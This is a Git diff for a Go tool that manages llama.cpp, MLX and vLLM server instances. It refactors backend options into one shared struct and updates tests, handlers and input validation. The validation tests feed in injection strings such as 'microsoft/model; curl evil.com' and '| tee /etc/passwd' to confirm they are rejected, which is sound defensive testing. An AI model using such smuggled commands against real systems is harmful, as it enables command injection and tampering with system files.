}
|
||||
case backends.BackendTypeMlxLm:
|
||||
if options.MlxServerOptions != nil {
|
||||
options.MlxServerOptions.Port = port
|
||||
}
|
||||
case backends.BackendTypeVllm:
|
||||
if options.VllmServerOptions != nil {
|
||||
options.VllmServerOptions.Port = port
|
||||
}
|
||||
}
|
||||
options.BackendOptions.SetPort(port)
|
||||
}
|
||||
|
||||
// assignAndValidatePort assigns a port if not specified and validates it's not in use
|
||||
|
||||
@@ -2,7 +2,6 @@ package manager_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/manager"
|
||||
@@ -14,10 +13,12 @@ func TestCreateInstance_Success(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -41,9 +42,11 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
|
||||
// Test duplicate names
|
||||
mngr := createTestManager()
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -97,9 +100,11 @@ func TestPortManagement(t *testing.T) {
|
||||
|
||||
// Test auto port assignment
|
||||
options1 := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -115,10 +120,12 @@ func TestPortManagement(t *testing.T) {
|
||||
|
||||
// Test port conflict detection
|
||||
options2 := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
Port: port1, // Same port - should conflict
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
Port: port1, // Same port - should conflict
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -133,10 +140,12 @@ func TestPortManagement(t *testing.T) {
|
||||
// Test port release on deletion
|
||||
specificPort := 8080
|
||||
options3 := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: specificPort,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: specificPort,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -161,9 +170,11 @@ func TestInstanceOperations(t *testing.T) {
|
||||
manager := createTestManager()
|
||||
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -184,10 +195,12 @@ func TestInstanceOperations(t *testing.T) {
|
||||
|
||||
// Update instance
|
||||
newOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -195,8 +208,8 @@ func TestInstanceOperations(t *testing.T) {
|
||||
if err != nil {
|
||||
t.Fatalf("UpdateInstance failed: %v", err)
|
||||
}
|
||||
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
|
||||
if updated.GetOptions().BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().BackendOptions.LlamaServerOptions.Model)
|
||||
}
|
||||
|
||||
// List instances
|
||||
|
||||
@@ -2,7 +2,6 @@ package manager_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/manager"
|
||||
@@ -36,9 +35,11 @@ func TestTimeoutFunctionality(t *testing.T) {
|
||||
idleTimeout := 1 // 1 minute
|
||||
options := &instance.Options{
|
||||
IdleTimeout: &idleTimeout,
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
@@ -85,9 +86,11 @@ func TestTimeoutFunctionality(t *testing.T) {
|
||||
|
||||
// Test that instance without timeout doesn't timeout
|
||||
noTimeoutOptions := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
},
|
||||
// No IdleTimeout set
|
||||
}
|
||||
@@ -116,25 +119,31 @@ func TestEvictLRUInstance_Success(t *testing.T) {
|
||||
|
||||
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
|
||||
options1 := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model1.gguf",
|
||||
},
|
||||
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model1.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
options2 := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
},
|
||||
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model2.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
options3 := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model3.gguf",
|
||||
},
|
||||
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model3.gguf",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
inst1, err := manager.CreateInstance("instance-1", options1)
|
||||
@@ -198,11 +207,13 @@ func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
|
||||
// Helper function to create instances with different timeout configurations
|
||||
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
Model: model,
|
||||
},
|
||||
IdleTimeout: timeout,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: model,
|
||||
},
|
||||
},
|
||||
}
|
||||
inst, err := manager.CreateInstance(name, options)
|
||||
if err != nil {
|
||||
|
||||
@@ -4,9 +4,6 @@ import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/backends/mlx"
|
||||
"llamactl/pkg/backends/vllm"
|
||||
"llamactl/pkg/instance"
|
||||
"net/http"
|
||||
"os/exec"
|
||||
@@ -43,7 +40,7 @@ func (h *Handler) LlamaCppProxy(onDemandStart bool) http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
if options.BackendType != backends.BackendTypeLlamaCpp {
|
||||
if options.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
|
||||
http.Error(w, "Instance is not a llama.cpp server.", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
@@ -130,14 +127,16 @@ func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
|
||||
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
|
||||
return
|
||||
}
|
||||
llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
|
||||
llamaOptions, err := backends.ParseLlamaCommand(req.Command)
|
||||
if err != nil {
|
||||
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
||||
return
|
||||
}
|
||||
options := &instance.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: llamaOptions,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: llamaOptions,
|
||||
},
|
||||
}
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
if err := json.NewEncoder(w).Encode(options); err != nil {
|
||||
@@ -179,7 +178,7 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
mlxOptions, err := mlx.ParseMlxCommand(req.Command)
|
||||
mlxOptions, err := backends.ParseMlxCommand(req.Command)
|
||||
if err != nil {
|
||||
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
||||
return
|
||||
@@ -189,8 +188,10 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc {
|
||||
backendType := backends.BackendTypeMlxLm
|
||||
|
||||
options := &instance.Options{
|
||||
BackendType: backendType,
|
||||
MlxServerOptions: mlxOptions,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backendType,
|
||||
MlxServerOptions: mlxOptions,
|
||||
},
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
@@ -233,7 +234,7 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc {
|
||||
return
|
||||
}
|
||||
|
||||
vllmOptions, err := vllm.ParseVllmCommand(req.Command)
|
||||
vllmOptions, err := backends.ParseVllmCommand(req.Command)
|
||||
if err != nil {
|
||||
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
||||
return
|
||||
@@ -242,8 +243,10 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc {
|
||||
backendType := backends.BackendTypeVllm
|
||||
|
||||
options := &instance.Options{
|
||||
BackendType: backendType,
|
||||
VllmServerOptions: vllmOptions,
|
||||
BackendOptions: backends.Options{
|
||||
BackendType: backendType,
|
||||
VllmServerOptions: vllmOptions,
|
||||
},
|
||||
}
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
|
||||
@@ -1,5 +1,7 @@
|
||||
package testutil
|
||||
|
||||
import "slices"
|
||||
|
||||
// Helper functions for pointer fields
|
||||
func BoolPtr(b bool) *bool {
|
||||
return &b
|
||||
@@ -8,3 +10,23 @@ func BoolPtr(b bool) *bool {
|
||||
func IntPtr(i int) *int {
|
||||
return &i
|
||||
}
|
||||
|
||||
// Helper functions for testing command arguments
|
||||
|
||||
// Contains checks if a slice contains a specific item
|
||||
func Contains(slice []string, item string) bool {
|
||||
return slices.Contains(slice, item)
|
||||
}
|
||||
|
||||
// ContainsFlagWithValue checks if args contains a flag followed by a specific value
|
||||
func ContainsFlagWithValue(args []string, flag, value string) bool {
|
||||
for i, arg := range args {
|
||||
if arg == flag {
|
||||
// Check if there's a next argument and it matches the expected value
|
||||
if i+1 < len(args) && args[i+1] == value {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
@@ -2,8 +2,6 @@ package validation
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/instance"
|
||||
"reflect"
|
||||
"regexp"
|
||||
)
|
||||
@@ -24,8 +22,8 @@ var (
|
||||
|
||||
type ValidationError error
|
||||
|
||||
// validateStringForInjection checks if a string contains dangerous patterns
|
||||
func validateStringForInjection(value string) error {
|
||||
// ValidateStringForInjection checks if a string contains dangerous patterns
|
||||
func ValidateStringForInjection(value string) error {
|
||||
for _, pattern := range dangerousPatterns {
|
||||
if pattern.MatchString(value) {
|
||||
return ValidationError(fmt.Errorf("value contains potentially dangerous characters: %s", value))
|
||||
@@ -34,83 +32,8 @@ func validateStringForInjection(value string) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// ValidateInstanceOptions performs validation based on backend type
|
||||
func ValidateInstanceOptions(options *instance.Options) error {
|
||||
if options == nil {
|
||||
return ValidationError(fmt.Errorf("options cannot be nil"))
|
||||
}
|
||||
|
||||
// Validate based on backend type
|
||||
switch options.BackendType {
|
||||
case backends.BackendTypeLlamaCpp:
|
||||
return validateLlamaCppOptions(options)
|
||||
case backends.BackendTypeMlxLm:
|
||||
return validateMlxOptions(options)
|
||||
case backends.BackendTypeVllm:
|
||||
return validateVllmOptions(options)
|
||||
default:
|
||||
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
|
||||
}
|
||||
}
|
||||
|
||||
// validateLlamaCppOptions validates llama.cpp specific options
|
||||
func validateLlamaCppOptions(options *instance.Options) error {
|
||||
if options.LlamaServerOptions == nil {
|
||||
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
|
||||
}
|
||||
|
||||
// Use reflection to check all string fields for injection patterns
|
||||
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
|
||||
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// validateMlxOptions validates MLX backend specific options
|
||||
func validateMlxOptions(options *instance.Options) error {
|
||||
if options.MlxServerOptions == nil {
|
||||
return ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
|
||||
}
|
||||
|
||||
if err := validateStructStrings(options.MlxServerOptions, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if options.MlxServerOptions.Port < 0 || options.MlxServerOptions.Port > 65535 {
|
||||
return ValidationError(fmt.Errorf("invalid port range: %d", options.MlxServerOptions.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// validateVllmOptions validates vLLM backend specific options
|
||||
func validateVllmOptions(options *instance.Options) error {
|
||||
if options.VllmServerOptions == nil {
|
||||
return ValidationError(fmt.Errorf("vLLM server options cannot be nil for vLLM backend"))
|
||||
}
|
||||
|
||||
// Use reflection to check all string fields for injection patterns
|
||||
if err := validateStructStrings(options.VllmServerOptions, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if options.VllmServerOptions.Port < 0 || options.VllmServerOptions.Port > 65535 {
|
||||
return ValidationError(fmt.Errorf("invalid port range: %d", options.VllmServerOptions.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// validateStructStrings recursively validates all string fields in a struct
|
||||
func validateStructStrings(v any, fieldPath string) error {
|
||||
// ValidateStructStrings recursively validates all string fields in a struct
|
||||
func ValidateStructStrings(v any, fieldPath string) error {
|
||||
val := reflect.ValueOf(v)
|
||||
if val.Kind() == reflect.Ptr {
|
||||
val = val.Elem()
|
||||
@@ -136,21 +59,21 @@ func validateStructStrings(v any, fieldPath string) error {
|
||||
|
||||
switch field.Kind() {
|
||||
case reflect.String:
|
||||
if err := validateStringForInjection(field.String()); err != nil {
|
||||
if err := ValidateStringForInjection(field.String()); err != nil {
|
||||
return ValidationError(fmt.Errorf("field %s: %w", fieldName, err))
|
||||
}
|
||||
|
||||
case reflect.Slice:
|
||||
if field.Type().Elem().Kind() == reflect.String {
|
||||
for j := 0; j < field.Len(); j++ {
|
||||
if err := validateStringForInjection(field.Index(j).String()); err != nil {
|
||||
if err := ValidateStringForInjection(field.Index(j).String()); err != nil {
|
||||
return ValidationError(fmt.Errorf("field %s[%d]: %w", fieldName, j, err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
case reflect.Struct:
|
||||
if err := validateStructStrings(field.Interface(), fieldName); err != nil {
|
||||
if err := ValidateStructStrings(field.Interface(), fieldName); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
@@ -2,9 +2,6 @@ package validation_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/testutil"
|
||||
"llamactl/pkg/validation"
|
||||
"strings"
|
||||
"testing"
|
||||
@@ -58,13 +55,11 @@ func TestValidateInstanceName(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
|
||||
err := validation.ValidateInstanceOptions(nil)
|
||||
var opts backends.Options
|
||||
err := opts.ValidateInstanceOptions()
|
||||
if err == nil {
|
||||
t.Error("Expected error for nil options")
|
||||
}
|
||||
if !strings.Contains(err.Error(), "options cannot be nil") {
|
||||
t.Errorf("Expected 'options cannot be nil' error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestValidateInstanceOptions_PortValidation(t *testing.T) {
|
||||
@@ -83,14 +78,14 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
options := &instance.Options{
|
||||
options := backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Port: tt.port,
|
||||
},
|
||||
}
|
||||
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
err := options.ValidateInstanceOptions()
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
|
||||
}
|
||||
@@ -137,14 +132,14 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Test with Model field (string field)
|
||||
options := &instance.Options{
|
||||
options := backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: tt.value,
|
||||
},
|
||||
}
|
||||
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
err := options.ValidateInstanceOptions()
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
|
||||
}
|
||||
@@ -175,14 +170,14 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Test with Lora field (array field)
|
||||
options := &instance.Options{
|
||||
options := backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Lora: tt.array,
|
||||
},
|
||||
}
|
||||
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
err := options.ValidateInstanceOptions()
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
|
||||
}
|
||||
@@ -194,14 +189,14 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
// Test that injection in any field is caught
|
||||
tests := []struct {
|
||||
name string
|
||||
options *instance.Options
|
||||
options backends.Options
|
||||
wantErr bool
|
||||
}{
|
||||
{
|
||||
name: "injection in model field",
|
||||
options: &instance.Options{
|
||||
options: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "safe.gguf",
|
||||
HFRepo: "microsoft/model; curl evil.com",
|
||||
},
|
||||
@@ -210,9 +205,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
},
|
||||
{
|
||||
name: "injection in log file",
|
||||
options: &instance.Options{
|
||||
options: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "safe.gguf",
|
||||
LogFile: "/tmp/log.txt | tee /etc/passwd",
|
||||
},
|
||||
@@ -221,9 +216,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
},
|
||||
{
|
||||
name: "all safe fields",
|
||||
options: &instance.Options{
|
||||
options: backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
HFRepo: "microsoft/DialoGPT-medium",
|
||||
LogFile: "/tmp/llama.log",
|
||||
@@ -237,7 +232,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := validation.ValidateInstanceOptions(tt.options)
|
||||
err := tt.options.ValidateInstanceOptions()
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
|
||||
}
|
||||
@@ -247,12 +242,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
|
||||
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
||||
// Test that non-string fields don't interfere with validation
|
||||
options := &instance.Options{
|
||||
AutoRestart: testutil.BoolPtr(true),
|
||||
MaxRestarts: testutil.IntPtr(5),
|
||||
RestartDelay: testutil.IntPtr(10),
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
||||
options := backends.Options{
|
||||
BackendType: backends.BackendTypeLlamaCpp,
|
||||
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||
Port: 8080,
|
||||
GPULayers: 32,
|
||||
CtxSize: 4096,
|
||||
@@ -264,7 +256,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
||||
},
|
||||
}
|
||||
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
err := options.ValidateInstanceOptions()
|
||||
if err != nil {
|
||||
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user